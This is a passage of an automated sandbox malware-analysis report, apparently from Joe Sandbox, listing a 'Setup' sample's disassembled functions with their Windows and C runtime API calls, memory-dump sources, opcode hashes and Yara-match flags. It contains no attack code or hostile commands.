                                                                                                                                                                                                                                                      • API ID: AdjustPointer
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1740715915-0
                                                                                                                                                                                                                                                      • Opcode ID: 0c94a2b4f76303ae540389fc1941a9e068f80556927b55d9d9a5e8451eaa1ea6
                                                                                                                                                                                                                                                      • Instruction ID: 3e2093e4da79cb6192a5f702dacde635bbff4af2fe48c73f3b58e230f9947ffc
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c94a2b4f76303ae540389fc1941a9e068f80556927b55d9d9a5e8451eaa1ea6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A551EF72600202AFDB6E8F54D840BAAB7B5EF00308F1445BDE946577A0F739EC40EBA0
                                                                                                                                                                                                                                                      Function 031D4697 Relevance: 6.1, APIs: 4, Instructions: 132COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: dd402297bcc1c4a0453b875176199acaf43ca7bf6ef9bff68e8ed04eaad1739b
                                                                                                                                                                                                                                                      • Instruction ID: 8c0f1c20dcd0c444fb9faec3398f3731d703fbc0b950ac4fa0e26007627c2967
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dd402297bcc1c4a0453b875176199acaf43ca7bf6ef9bff68e8ed04eaad1739b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A41F6BAA00754AFD725DF39CC41B5ABBB9EB8E710F14462EE045DF680DFB19A418780
                                                                                                                                                                                                                                                      Function 02D85E7B Relevance: 6.1, APIs: 4, Instructions: 132COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: bf9403094a09c213dd7f70900c1e2b38e6d2512992a67aba0aecdf4ecfa4432d
                                                                                                                                                                                                                                                      • Instruction ID: 80f3f71ae667d9c978046b4c8c6018ea9294e253205846c99ed48372c6d0f91b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bf9403094a09c213dd7f70900c1e2b38e6d2512992a67aba0aecdf4ecfa4432d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5741D572A00704BFD715AF38DC44B6ABBAAEB44710F51856AE051DB780E775AD41CB90
                                                                                                                                                                                                                                                      Function 031D82A8 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 031D92FE: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,031D81B3,?,00000000,-00000008), ref: 031D935F
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 031D830C
                                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 031D8313
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?), ref: 031D834D
                                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 031D8354
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1913693674-0
                                                                                                                                                                                                                                                      • Opcode ID: a8e8897f03f6d81be4a876441447879bd3834869e2a2a73b2f6ddd1cfbd4ed3e
                                                                                                                                                                                                                                                      • Instruction ID: 38d0e91774c3042cc0141f297c66976240716c45b22a5a5f2aac851c935bbaa9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a8e8897f03f6d81be4a876441447879bd3834869e2a2a73b2f6ddd1cfbd4ed3e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F4219275604755BFDB11EF6AC88096BB7ADFF1E2647048569E81DDB540DB30EC40CBA0
                                                                                                                                                                                                                                                      Function 02D64CED Relevance: 6.1, APIs: 4, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 02D64CF4
                                                                                                                                                                                                                                                      • _Maklocchr.LIBCPMT ref: 02D64D87
                                                                                                                                                                                                                                                      • _Maklocchr.LIBCPMT ref: 02D64D97
                                                                                                                                                                                                                                                      • _Getvals.LIBCPMT ref: 02D64DB9
                                                                                                                                                                                                                                                        • Part of subcall function 02D5E387: _Maklocchr.LIBCPMT ref: 02D5E3B6
                                                                                                                                                                                                                                                        • Part of subcall function 02D5E387: _Maklocchr.LIBCPMT ref: 02D5E3CC
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Maklocchr$GetvalsH_prolog3_
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 402987911-0
                                                                                                                                                                                                                                                      • Opcode ID: ccaef6109f0c38270a8ea9ae5b9ba65526872207bb84f82b9a6c9f5965ec12e2
                                                                                                                                                                                                                                                      • Instruction ID: 451c85c54a9af1540964f29258e608296f7ba8dd7a2ef0ff99b0728c3ae8deac
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ccaef6109f0c38270a8ea9ae5b9ba65526872207bb84f82b9a6c9f5965ec12e2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C62130B2D00224AADF15FFA4D845ADE7BA9EF04710F148456B9149F241EBB4CA45CFB1
                                                                                                                                                                                                                                                      Function 031D93A1 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 031D93A9
                                                                                                                                                                                                                                                        • Part of subcall function 031D92FE: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,031D81B3,?,00000000,-00000008), ref: 031D935F
                                                                                                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 031D93E1
                                                                                                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 031D9401
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 158306478-0
                                                                                                                                                                                                                                                      • Opcode ID: d0bc597c568e6d872663aab8648a377b9800c4dfe5436c19eef17ee0443c2957
                                                                                                                                                                                                                                                      • Instruction ID: b3972e923ce8f444547bb67b602821da6553ae5d23fc8dc9e38416b96739b90a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0bc597c568e6d872663aab8648a377b9800c4dfe5436c19eef17ee0443c2957
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C21122BA5012157FAB19BBB25EC8CBF796CDE8F2A57080524F906DA100EB64CD4181B1
                                                                                                                                                                                                                                                      Function 031D3E5A Relevance: 6.1, APIs: 4, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,03205040,?,031D3F69,?,?,00000000,?), ref: 031D3F1B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                                                      • Opcode ID: c10cc435ac42e751144f0dc4d5fa51406071e1f71b4ece9f97403a12237ca963
                                                                                                                                                                                                                                                      • Instruction ID: 543ca11054141487f354613124317536cb1542464db29b78af77567272bb1bda
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c10cc435ac42e751144f0dc4d5fa51406071e1f71b4ece9f97403a12237ca963
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF21277AA04214EBC731EB649C44A5F7768AF4F7A0B190A14E931AB2C0D731E904C6E2
                                                                                                                                                                                                                                                      Function 0319E1A0 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0319E1CF
                                                                                                                                                                                                                                                      • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,?,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0319E1F1
                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000,?,00000000,00000000,?,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0319E210
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0319E226
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3604237281-0
                                                                                                                                                                                                                                                      • Opcode ID: ec7f079cb6412e22e07abe3e4c4a5707dfb586d54b2ad47ce3f192bbf3e74feb
                                                                                                                                                                                                                                                      • Instruction ID: 1cbebc23fb433a51d81b19d18e985850c8db2cdbd826469954a9253ca5cbbd85
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec7f079cb6412e22e07abe3e4c4a5707dfb586d54b2ad47ce3f192bbf3e74feb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B11C471740200ABEB14EA68EC89F6AB77CAB4DB11F144259F500AF2C4D770F94487A1
                                                                                                                                                                                                                                                      Function 02D7328E Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 02D732AA
                                                                                                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02D732C3
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value___vcrt_
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1426506684-0
                                                                                                                                                                                                                                                      • Opcode ID: 19ff3a3b1c0fb98505645bafc6050a4638d904fbdad8d99c4c42bb6ae46b1f43
                                                                                                                                                                                                                                                      • Instruction ID: 070a93d0a637b252ab2004af6854554a83b21faca57de2cb3515367c0d9343fa
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19ff3a3b1c0fb98505645bafc6050a4638d904fbdad8d99c4c42bb6ae46b1f43
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13014C322097515EAB6227B97CD86162766EB11778B30027EF420443E0FF5D4C10F6D8
                                                                                                                                                                                                                                                      Function 031A8904 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031A890B
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031A8916
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031A8984
                                                                                                                                                                                                                                                        • Part of subcall function 031A8A97: std::locale::_Locimp::_Locimp.LIBCPMT ref: 031A8AAF
                                                                                                                                                                                                                                                      • std::locale::_Setgloballocale.LIBCPMT ref: 031A8931
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 677527491-0
                                                                                                                                                                                                                                                      • Opcode ID: 169fc9fec98dc4c67f0fe34d86d1805b549f34315753d5eb62fc6e16f0d1988d
                                                                                                                                                                                                                                                      • Instruction ID: 8ffdd54d4896d355066e2d40d0677583f448fffe8e05ad9032037c47f46748e4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 169fc9fec98dc4c67f0fe34d86d1805b549f34315753d5eb62fc6e16f0d1988d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5901B17DA00A11DFC70AFF64D84897D7BA2FF8C741B184008D8025B391CB356A42CBD1
                                                                                                                                                                                                                                                      Function 02D5A0E8 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D5A0EF
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D5A0FA
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D5A168
                                                                                                                                                                                                                                                        • Part of subcall function 02D5A27B: std::locale::_Locimp::_Locimp.LIBCPMT ref: 02D5A293
                                                                                                                                                                                                                                                      • std::locale::_Setgloballocale.LIBCPMT ref: 02D5A115
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 677527491-0
                                                                                                                                                                                                                                                      • Opcode ID: af8a9120320a6be9aca0b7c4beea30fe8acf883fca1089df6c6845f174338a80
                                                                                                                                                                                                                                                      • Instruction ID: a95fc4b77b7518b1a5cab2c4ec87c90d31512248c0c4abac7b89c608ba49bb37
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: af8a9120320a6be9aca0b7c4beea30fe8acf883fca1089df6c6845f174338a80
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF018C35A005219BCF06AB6099909BD77A2FB84740F144099D80657380CF756E42CFA9
                                                                                                                                                                                                                                                      Function 02D6106B Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D61072
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D6107C
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D610ED
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1383202999-0
                                                                                                                                                                                                                                                      • Opcode ID: 70c87bdda0fd07e2d3989441a3f7056200c31740e272e497f8c858e2d1b7f537
                                                                                                                                                                                                                                                      • Instruction ID: 46243b58354380158f88b042e835c78d2a28e01291d51af42de9330aa04c29b2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 70c87bdda0fd07e2d3989441a3f7056200c31740e272e497f8c858e2d1b7f537
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 61F0CD319001259BCF04EAA0C8646BEB226EF50314F604119E9186B3D0DF35DE0A8BA5
                                                                                                                                                                                                                                                      Function 02D61100 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D61107
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D61111
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D61182
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1383202999-0
                                                                                                                                                                                                                                                      • Opcode ID: d5ff3716c4062411fd575accb4c8212aee0a45f577c63d983057cd3d5edba7ca
                                                                                                                                                                                                                                                      • Instruction ID: 9071f3a1af1f36988e4ae34f3e10307ca949ded2c9a4ddd6461a3695a2c7873c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5ff3716c4062411fd575accb4c8212aee0a45f577c63d983057cd3d5edba7ca
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A7F0F0319001259BCF04EB64C8647FE7326EF50324F604519E9286B3C0DF38CE058FA4
                                                                                                                                                                                                                                                      Function 02D60FD6 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D60FDD
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D60FE7
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D61058
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1383202999-0
                                                                                                                                                                                                                                                      • Opcode ID: ee4847afd6d8dd9f3f0054ed2b120fc231305d76b8d05e3d82fa52ff576c59bf
                                                                                                                                                                                                                                                      • Instruction ID: c4dd140be2a8837d63c832d0650121173df781f0caa52187fffac58dd04d9303
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee4847afd6d8dd9f3f0054ed2b120fc231305d76b8d05e3d82fa52ff576c59bf
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4FF0C7319001699BCF18EBA4C964BFE7266EF40324F600519E8286B3D4DF38CE09CBA5
                                                                                                                                                                                                                                                      Function 02D60F41 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D60F48
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D60F52
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D60FC3
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1383202999-0
                                                                                                                                                                                                                                                      • Opcode ID: 4b402089a9de233b4e65ebc637db98c4c1fb353b1df5abb15a3887595f7e0078
                                                                                                                                                                                                                                                      • Instruction ID: 464ba65cca5f106a007291f3beebe0df24be6596022ef044ea8f75e060ee6eca
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4b402089a9de233b4e65ebc637db98c4c1fb353b1df5abb15a3887595f7e0078
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B2F0F0319002259BCF04EB64C9547FEA726EF50325F604119E9146B3C0DF749E0A8BB5
                                                                                                                                                                                                                                                      Function 031E0627 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • WriteConsoleW.KERNEL32(00000000,?,031C3AD5,00000000,00000000,?,031DD52D,00000000,00000001,?,?,?,031D29BA,?,00000000,00000000), ref: 031E063E
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,031DD52D,00000000,00000001,?,?,?,031D29BA,?,00000000,00000000,?,?,?,031D2F5D,?), ref: 031E064A
                                                                                                                                                                                                                                                        • Part of subcall function 031E0610: CloseHandle.KERNEL32(03205AD0,031E065A,?,031DD52D,00000000,00000001,?,?,?,031D29BA,?,00000000,00000000,?,?), ref: 031E0620
                                                                                                                                                                                                                                                      • ___initconout.LIBCMT ref: 031E065A
                                                                                                                                                                                                                                                        • Part of subcall function 031E05C6: CreateFileW.KERNEL32(031F4E78,40000000,00000003,00000000,00000003,00000000,00000000,031E05F5,031DD51A,?,?,031D29BA,?,00000000,00000000,?), ref: 031E05D9
                                                                                                                                                                                                                                                      • WriteConsoleW.KERNEL32(00000000,?,031C3AD5,00000000,?,031DD52D,00000000,00000001,?,?,?,031D29BA,?,00000000,00000000,?), ref: 031E066F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2744216297-0
                                                                                                                                                                                                                                                      • Opcode ID: 8b27fda9333da75bb62542bf5914f7c64f041db5407483d8ddb5ef727aba23bb
                                                                                                                                                                                                                                                      • Instruction ID: fd7681f32d861419c1cbf20ca7c94bffecc8183802f3104c74bcd22cd88ec24e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b27fda9333da75bb62542bf5914f7c64f041db5407483d8ddb5ef727aba23bb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9EF0123A400614BBCF227FD5DC08A8A7F25FF4D3A1F144051F91999110D77389609FA0
                                                                                                                                                                                                                                                      Function 02D61195 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D6119C
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D611A6
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • moneypunct.LIBCPMT ref: 02D611E0
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D61217
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
